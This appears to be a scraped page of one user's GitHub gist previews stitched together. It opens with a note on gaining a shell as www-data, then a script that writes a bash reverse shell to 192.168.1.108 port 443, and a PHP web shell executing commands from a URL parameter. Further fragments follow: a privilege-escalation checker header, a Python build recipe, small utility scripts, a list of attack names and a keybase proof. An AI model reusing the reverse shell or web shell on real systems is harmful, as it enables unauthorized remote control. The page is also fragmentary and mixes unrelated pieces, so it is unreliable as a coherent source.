- Heroku app Deployment
I'd faced issue while executing any command using .run
command as it doesn't supporting white spaces and raising exception(for example ls index.html
).
I figured up it by creating a .sh file with limited privledge session(www-data) in /html directory.
echo "#! bin/bash" > abc.sh
echo $'\n' >> abc.sh
echo "bash -i >& /dev/tcp/192.168.1.108/443 0>&1" >>abc.sh
chmod +x abc.sh
Now in hexchat exexcute:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
system($_GET['cmd']); | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/env python | |
############################################################################################################### | |
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script | |
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift | |
##------------------------------------------------------------------------------------------------------------- | |
## [Details]: | |
## This script is intended to be executed locally on a Linux box to enumerate basic system info and | |
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text | |
## passwords and applicable exploits. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -OL http://www.python.org/ftp/python/2.7.11/Python-2.7.11.tgz | |
tar xzvf Python-2.7.11.tgz | |
cd Python-2.7.11 | |
./configure --prefix=/usr/local --enable-shared | |
make | |
make install |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys | |
if __name__ == "__main__": | |
if len(sys.argv) != 2: | |
print "usage: %s names.txt" % (sys.argv[0]) | |
sys.exit(0) | |
for line in open(sys.argv[1]): | |
name = ''.join([c for c in line if c == " " or c.isalpha()]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Store this file in ~/.pystartup, | |
# set "export PYTHONSTARTUP=/home/user/.pystartup" | |
# | |
# Note that PYTHONSTARTUP does *not* expand "~", so you have to put in the | |
# full path to your home directory. | |
import atexit | |
import os | |
import readline | |
import rlcompleter |
- Arbitrary file access
- Binary planting
- Blind SQL Injection
- Blind XPath Injection
- Brute force attack
- Buffer overflow attack
- Cache Poisoning
- Cash Overflow
- Clickjacking
- Command injection attacks
I hereby claim:
- I am avicoder on github.
- I am avicoder (https://keybase.io/avicoder) on keybase.
- I have a public key ASA5E3ToP1__j0WJ0hVsfEKPF-t9pWa1Ka31uZpGM32rawo
To claim this, I am signing this object: